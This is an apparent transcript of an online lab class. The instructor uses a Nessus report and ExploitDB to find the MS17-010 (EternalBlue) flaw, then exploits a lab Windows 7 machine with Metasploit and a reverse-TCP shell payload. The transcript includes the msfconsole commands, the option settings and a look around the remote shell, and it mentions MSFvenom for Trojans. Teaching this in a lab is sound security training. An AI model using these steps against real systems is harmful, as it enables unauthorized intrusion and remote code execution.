This conference will now be recorded.
Okay. Hello. Ben Wahab, can you hear me? Am I audible, guys?
Yes.
Perfect. Okay, guys, let's get started without any further ado. So, as mentioned earlier, in today's class, we'll be going with vulnerability assessment from the report that we're going to get from Nessus. So, in last class, I've shown you how to initiate a scan. And once the scan is done, these are the results available from it. Okay, so I've shown you what to go through in the results as well. So, no matter what device you open up, if there is a vulnerability, let's say if we go for this Windows 7 machine here, okay, and in Windows 7, whenever you see any sort of vulnerability, so the first one is critical. So it says it's unsupported OS. Now this is a misconfiguration. So the user is using an outdated OS. Okay, so there's no exploitation for this. He just needs to update or upgrade to a supported operating system. But some vulnerabilities are not misconfigurations. They are due to again bugs in the source code of the application or the operating system itself. So if you go to this next one here, you can see this is an issue with something called the SMB service. Okay, and due to this vulnerability on this SMB service, hackers can exploit them with a specially crafted packet and execute arbitrary code. Executing arbitrary code in the sense, again, they can get remote connections and execute any code of their choice. Okay. And if you notice, if you scroll down over here, there's something called exploitable with Metasploit. So whenever you see this information here, exploitable with exploits are available, it means that this is not a misconfiguration. It was a bug found by some security researcher on the service. Okay, and that it can be attacked on and it can be gotten a reverse connection on. So today we're going to learn how do you use that exploit and how do you use this Metasploit framework. Okay. So first things first, let's try to generate a report for this. I've not shown you that yet. So go back to vulnerabilities. And once you have the list of all the devices here, on the top right corner, you have this report button. Click on that. And there are two formats of reports. One is just a list of vulnerabilities, again, a very brief list that is not going to help you in any way. It only gives you the names of the vulnerabilities. But there's one more called detailed vulnerabilities. So this is the one that you always take, okay, which gives you detailed information about every vulnerability, just like in the Nessus tool. And when you click on generate report, it's going to download now automatically. And yeah, here's the report. As you can notice when I open this up, this is a detailed report of each device, okay, where it shows how many critical vulnerabilities are there, how many high vulnerabilities are there, how many medium, how many low, how many information based, and then each vulnerability is elaboratively explained here. Synopsis, description, the output of it. Again, what tools can you use to attack on it, etc., etc. Okay, so this is a detailed report to make you understand what system contains what vulnerabilities and how do you attack on it. Okay, so let's assume today we're going to attack this machine, the Windows 7 machine here. Okay, so this Windows 7 had a vulnerability saying it is vulnerable on the SMB service. Okay, and due to this, hackers can attack this and get remote connection. And as mentioned earlier, it says that it has exploits available. So to get this exploit now, we can use our website exploitdb. So I can go to exploitdb here, and in exploitdb, I can use a search for this exploit. How can I do that? I can use these wordings. I can use eternal blue or eternal champion or this ID as well, MS17010. So if I copy that unique ID and if I paste it here, you can see I'm getting exploits for that. Okay, so this is the eternal blue or eternal romance or eternal synergy, same name. I mean different names for the same exploit. Okay, which can be used in Metasploit framework MS17010. Okay, so again, this is the code that we got to use in our Kali system to attack our target system. Okay, Windows 7. So now the question that arises is, how do you check if this is available in your Kali or not? So the good thing about Kali is it has a tie-up with ExploitDB, guys. Whatever exploits are available in ExploitDB, they get updated from time to time in Kali machine automatically. That's why it's one of the best operating systems for pen testing. And just to check if you have that exploit available or not, you can open up your terminal in Kali and run a simple command here called search exploit. So this is a command to search for exploits. And you can give any keyword here, let's say MS17-010. And now when you hit enter, this tells you if the exploit is available in your system or not. Okay, so as you can notice over here, it says these are all the exploits available. Okay, and this is the path where it is available: Windows remote 43970.rb, etc., etc. Okay, so when I download this file, when I click on download, you can see it's downloading the same file, 43970.rb. It's a file written in Ruby. Okay, so that same exact file is available here as well, 43970.rb. Okay, and if I show you this path, Windows remote 43970, it's in your user folder. So if you go to my folders in your file system, if you go to user, in user you have a folder called share. These are the folders shared by all users again, and in this there's a folder called exploitdb. So you can see there's a folder here, exploitdb. In that I have to go to exploits, and from here I have to follow this path, Windows remote 43970. So here in Windows, in remote, there should be an exploit 43970. So I can search as well, 43970. Oh, did I search? 43. Let me search over here. It's a bit slow because there's too many exploits. There's thousands and thousands of exploits available. Mhm. Let me open it up again. User, share, and then exploit DB. And in this I go to exploits and then Windows remote, and here I search for 43970. 4. Oh, my numlock is off. 4. Why is it not searching? 43970, and you can see I found the file here. Okay, so all these exploits are pre-installed in Kali already, and all you have to do is use them in the Metasploit framework. Now, an intro on Metasploit framework, guys. This is a penetration testing framework which was built basically as a LAN game earlier, but today it is being used as penetration testing or vulnerability assessment. And one of the most important modules of Metasploit framework is your Metasploit console. Okay, so if I open up the notes for this penetration testing, so your Metasploit framework, as mentioned, is a penetration testing framework available for performing vulnerability assessment. It had four important modules: MSF Console, MSF Venom, MSF Encode, and Armitage. But these last two are not in use anymore. The only two working modules are right now MSF Console and MSF Venom. MSF Console is the main tool, the Metasploit Framework Console, which contains all the exploits and payloads for pen testing. MSF Venom is to create Trojan tools or to create Trojan attacks. So it is used to create malicious applications or executables for social engineering, for sending Trojans and getting remote connections through those Trojans. MSF Encode was a tool to encode your payloads, okay, to make them see to it that you cannot detect them from antiviruses or firewalls, okay. But this has been now included already in MSF Console, so there's no separate module anymore, okay. And Armitage was the graphical version, or the GUI version of MSF Console. It contained a lot of bugs actually, and people didn't give it much support, so it's obsolete right now, okay. So now the only two working modules that we have are MSF Console and MSF Venom. Okay. And MSF Console is the main tool to use for performing penetration testing. Okay. And it's a completely terminal-based tool, guys. So you have to remember these steps exactly the same way. And again, they might seem a bit complex, but there's a certain procedure to follow. Okay. Again, let me list out the procedure first, and then I'm going to explain the commands. Step number one, you start the Metasploit framework. There are certain commands for it. I'm going to explain this in a minute. Okay. Once the Metasploit framework is started up, then you search for the exploit. You search with the keyword for the exploit. Once you find the keyword, you use that exploit. Once an exploit is used, you have to search for a payload compatible with that exploit. So you type show payloads. Then you set a certain payload compatible, and then you configure the options for the exploit and the payload. And finally, you try to attack with that exploit. Okay. So again, remember 7 or 8 steps, not more than that. Okay. Start the framework, search for an exploit, set an exploit, search for payloads, set a payload, configure the exploit and the payload with the correct options to attack the correct system, and then run the command exploit in the end. That's all. Okay. Now these steps are common in no matter what performance, or what penetration testing you perform. Okay. But the thing is, all of this is terminal based, and you have to remember the commands for each of these operations. Okay. So let's get started without any further ado. So first things first, I have to start my Metasploit framework, and there are two commands for this. Command number one, service post GRESQL start. So this is a command to start a database called PostgreSQL. This database contains all the exploits and the payloads available for Metasploit framework. So once you hit enter, this starts up that database now, so that your Metasploit framework can fetch the again exploits and the payloads from it. Okay. Now once the database is ready, you run the command msf console to start the Metasploit framework console. So hit enter. This will take a minute. It's quite a huge tool, so it will take a minute to start up. And once it's ready, you get a screen as such where it says MSF6. Now you're not going to be in your root terminal anymore. You will be inside the Metasploit framework tool. Okay. So again, this is just a banner message here, guys. So you might get a completely different banner from mine. So by type banner, you can see these are all different banners. The students sometimes get confused saying, sir, your screen is not same as mine. Okay, not necessary to be same. It's just banner messages. So you keep getting different banners. Okay. So now once you're within the Metasploit framework here, you have to search for an exploit. So you run the command search and you give the keyword here, just like how we did with searchsploit. I'm going to give the keyword MS17010, the keyword for our exploit. Okay. And now when I hit enter, you can see. Okay. Oh, if I scroll up, these are all the exploits available. Okay. There's this one here, first exploit available here. Okay. Attacking so and so systems, etc., etc. Okay. Then there's this one, another exploit. Okay. Then there's this one, another exploit. Oh, sorry, over here. Okay. Then there's this one, which is another exploit. Okay. And then there's this one, which is another exploit. So right now there are 5 exploits available with that same keyword. Okay. So now we got to use one of them. So we don't exactly know which one it would be. So we just do a trial and error method. Okay. The most relevant one will be in the first one itself. Okay. So this is MS17010 eternal blue SMB remote connection attack Trojan. So not Trojan, an exploit. So we can copy that exploit now. Okay, so this is information about the exploit. What target is it attacking? What systems it's compatible with, etc., etc. Okay, so I'll just copy this exploit now, and to use the exploit now, I'll run the command use so and so exploit. I have to copy the path and paste the entire path here. Okay, so when I type show exploits, it showed me multiple exploits here, right? Or when I try search for MS17-010, these were all the exploits available. So I have to copy the entire path of this exploit, and then I have to type use so and so path. Okay. Now once you're within the exploit, you have to set a payload as well. So you type show payloads. It shows the entire list of payloads available here. So right now there are around 73 payloads. Okay. So 1 second. Let me make it a bit more clearer. Yeah, much better. Okay, so there are around 73 payloads available for this exploit. Again, in real time, for the other ones, you will not get these many payloads, guys. You might find 3 or 4, but since this is quite an old one, there's multiple payloads here. Okay, and to understand what payload, what any of these payload does, you can read the path, or again, copy paste it in your browser to understand what it does. Okay, but again, basically these payloads are to give you reverse connections. Okay, and these connections can be of multiple types. You can get a Metapreter connection, you can get a PowerShell connection, or just a simple shell connection as well. Okay, so let's go for the simplest of all payloads, shell reverse TCP. So there's a payload here to attack a Windows system of 64-bit architecture and give you a shell connection using reverse TCP protocol. Okay, so just like how you get a Trojan connection, a reverse Trojan connection, this works the same way. So always look out for reverse TCP payloads. Okay, you can either get a shell connection with that, you can get a PowerShell connection as well, PowerShell reverse TCP, or you can get a Metapreter connection as well. Don't worry what a Metapreter is. I'll talk about this in the next class. It's a much more advanced payload. Okay, but for now, I'll just take a shell connection. Okay, so I'll try to get a remote connection over the command prompt of the target system. So I'll copy this payload Windows x64 shell reverse TCP. I'll copy that payload, and now I'll run the command set payload and the path of the payload. So to use a certain payload, you type set and then you give the name payload and then specify the path for the payload. Hit enter. Now you have used the exploit and the payload both. And now you configure the options for them. So you type show options. And now when you hit enter, these are all the options available. And there are 4 important options to configure always. Okay, so whenever you see required as yes, it means that option should have some value for it. It should not be left empty. Okay, and the 4 important options are rhost, rport, lhost, and lport. Okay, so in any exploit, these are the 4 options you have to configure. What is the remote host you're attacking, their IP address? What is the remote port you're sending the again, connection on or getting the connection from? And lhost and lport are local host and local port. What is the attacker's IP and the attacker's port number on which we're getting the reverse connection? Okay, so now here I have to set the rhost first. Rhost is my target IP. So my Windows 7 right now is getting the IP of 192.168.0.6, as you can notice. So I'll set that IP here. Set rhost 192.168.0.6. Okay. So if I type show options again, earlier this rhost was blank, but now when I hit enter, you can see that IP has been set. Okay. So our host has been set. Our port is 445. That's the default port on which the vulnerability exists. You can see that in the Nessus tool as well. So if I go to Nessus here, you can see it's attacking the port 445. Okay. So now if I go back to my Metasploit, I need to set the L host and L port as well. So right now my Kali system's IP. So if I type ifconfig, my system's IP is 0.9, and that is already set here, as you can notice. So now what I'm going to do is I'm going to set the L port. So L port is also set. If you want, you can change that. Set L port, let's say any random port number, 5566. Okay. So once everything has been configured, once all the options have been configured, R host, R port, L host, and L port, last command to run is exploit. So it uses these exploits and these payloads with these exact options to attack the target system. Now when I hit enter, If the exploit is truly causing a damage, I should now get a remote shell connection. So let's wait for that. So as you can see over here, I've got the remote Windows shell session. Okay, cd space dot dot, cd space dot dot, cd space users, dir to restore all the files, cd space root, cd space desktop, and these are the files on desktop. There's a folder called freak, there's a directory, again directory called freak, directory called share, and there's a file called showup.txt as well. And those are the same things which are visible here, as you can notice. Okay, so this shows me that I've got a complete remote shell connection. Okay, I didn't send any malwares, I didn't send any trojans, I didn't make the user click on anything. There's just a service running on the system which is vulnerable, and through that vulnerable service, hackers can now get remote connections and execute any code of their choice. Okay, and the victim will not even know about it. So this is what the vulnerability stated in the Nessus tool as well. Using this, a remote, unauthenticated, unauthorized attacker can exploit this with a specially crafted packet. That specially crafted packet is nothing but your exploit here. This is the specially crafted packet. Okay. And using this, he can execute arbitrary code. He can execute any code of his choice without the user getting to know about it. Okay, so that was what the vulnerability was. Okay, and the solution for this is, again, Microsoft has released a set of patches for this vulnerability. So if you update those patches, this vulnerability doesn't exist anymore. Okay, so that is how you perform penetration testing, guys. Okay, again, start the Metasploit framework, search for the keyword, use a certain exploit, search for payloads, use a certain payload, and then configure the exploit and the payload to attack. Those are the 7 important steps. Okay, but again, as mentioned, you have to remember these commands, guys. Okay, so no matter in tomorrow's class as well, we'll be working on the same commands but for a different machine. Okay, so in the next session, we'll try to attack the other system Metasploitable, but without the help of Nessus. So if you didn't have a report, how do you perform pen testing then? That's what we learn in the next session tomorrow. Okay. So yeah, that's that, guys. Nothing further. Any questions, any doubts up to this point? Wahab, Ben, oh, Charles, hi. Oh, I wanted to ask one more thing, guys. Is it a holiday for you guys tomorrow by any chance? Do we take up the session tomorrow or? Okay, then let's do one thing. Since it's a holiday, we'll be connecting back on Monday itself then. So I think it's July the 4th. It's 4th today already for us here, but it should be 4th for you tomorrow, I suppose. So yeah, no class tomorrow then. We'll be connecting back on Monday itself. It's gonna be a holiday for you guys from tomorrow. So yeah, that's that. Nothing further. You have ample amount of time to practice, and I'll be sharing this recording as well shortly. So you can
Hello,
go through
Schwab.
that. Oh yeah,
Okay.
hi Charles.
Yeah, I was even about to talk about the recordings because this is a bit complex, so it needs some kind of practice. I mean, an immediate
I will.
practice. That is why, yeah.
I'll share the recording, Charles.
And
Sure.
it's
I
just
will get it
unfortunate that
shortly.
on Monday, 1st July, was also a holiday here in Canada. But
Oh,
all the same, it's all good. It's all good.
I didn't
It's
know,
all,
Charles. I was
it's
informed
all good.
about this by another student actually in another batch.
Oh, it's fine.
So
It's
tomorrow
okay.
it's a holiday. We'll be connecting back on Monday again.
Sure, that's
Sure.
fine.
Sure.
So
So yeah,
be
that's
on the
that. Nothing.
standby for the recordings, yeah.
I will. I'll share the
Yeah.
recordings, both the
And please,
yesterday's and
I'll send you a message on WhatsApp. Just check it out for me. Just something that I want you
oh,
to have.
one second. I haven't gotten anything yet, Charles.
No, I'm sending it to you so we can be. I think it's just something that I want you to have a look. Nothing more. So
Sure, sure. I'll look into it, Charles. No worries. So yeah, that's that, guys. Nothing further for our session today. We'll be connecting back on Monday again. I'll be sharing these recordings and the notes. Please follow these exact same procedures. And again, check out. So yeah, that's it. Let's exit the session here. Connect back in the next class. Bye bye.
sure. Thank you. I'll send it to you so you can check it out. Sure. Thanks.
Sure. I'll check it out, Charles.